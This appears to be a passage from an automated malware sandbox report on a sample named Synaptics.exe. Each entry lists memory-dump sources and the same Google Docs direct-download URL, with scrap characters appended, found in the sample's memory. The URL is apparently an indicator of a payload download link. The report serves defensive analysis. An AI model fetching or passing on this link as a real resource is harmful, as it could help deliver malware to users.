                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3070010239.000000003B051000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3017903336.000000001D6FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWm
                                Source: Synaptics.exe, 00000002.00000002.3097156090.00000000426CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3042532479.000000002A5CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3060111522.000000003583E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2964923544.0000000006C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3065916492.000000003957E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2975677614.000000000A6BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3025032728.000000001EABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3099202998.000000004384E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3094940361.000000004118E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2981310460.000000000DB3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3064074688.00000000382BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2977915342.000000000B6FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3035070752.000000002534E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3026683627.000000001FE3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3040275736.0000000028CCE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3090299303.000000003E5CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3057470295.0000000033DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3052254278.00000000306FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3042083444.000000002A0CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2973936990.000000000953E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3037251151.0000000026C4E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX8
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX:
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXG
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY3so
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYTY
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZPw
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_l
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                                Source: Synaptics.exe, 00000002.00000002.2959950848.000000000532C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaRI
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadW
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadam
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadamH
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadan
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadanQ
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3070010239.000000003B051000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc.d;
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcS
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcaP
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcatiTP$
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcbM
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcdn.g
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadceH
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcet
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-ua
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-ug
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch=
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadche
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcmZ
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcted
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcting
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadctors
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcu#n
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcuritu
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd)Wi
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.T
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.moo
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd:
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddL
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddeW
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddqW
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeE~
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadec
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadecW
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadecuri
